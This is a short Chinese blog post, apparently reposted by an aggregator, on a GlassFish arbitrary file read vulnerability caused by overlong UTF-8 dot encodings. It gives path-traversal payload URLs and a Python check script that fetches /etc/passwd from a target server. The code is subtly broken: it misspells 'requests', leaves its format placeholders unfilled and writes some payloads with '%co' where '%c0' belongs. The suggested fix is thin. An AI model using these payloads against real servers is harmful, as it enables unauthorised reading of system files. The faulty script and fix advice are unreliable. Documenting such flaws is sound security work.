glassfish任意文件读取漏洞解析

Posted 挖洞的土拨鼠

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了glassfish任意文件读取漏洞解析相关的知识,希望对你有一定的参考价值。

一、背景:

glassfish是一款java编写的跨平台的开源的应用服务器。

二、漏洞原理:

与宽字节SQL注入一致,都是由于unicode编码歧义导致的。具体payload如下构造:

http://ip:port/theme/META-INF/%c0%ae%co%ae/%c0%ae%co%ae/xxxpath/xxxfile

上述利用可以变形:

http://ip:port/theme/META-INF/%c0.%co./%c0.%co./%c0.%co./%c0.%co./%c0.%co./xxxpath/xxxfile

三、修复方案:

过滤掉. /等关键输入即可。

四、检查部分关键代码:

1 #glassfish any files readable vuln:
2 import requests
3 def check(ip,port):
4     url = "http://%s:%s/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd"
5     response = requsets.get(url)
6     if response.status_code == 200:
7         print "Vuln"

 

以上是关于glassfish任意文件读取漏洞解析的主要内容,如果未能解决你的问题,请参考以下文章

iis7.0解析漏洞 php用啥软件检测

任意文件读取漏洞的利用指南

File Inclusion 代码解析 1

代码审计两个任意文件读取漏洞实例

Tomcat幽灵猫任意文件读取漏洞复现

FFmpeg本地任意文件读取漏洞 / FFmpeg Local arbitrary file read vulnerability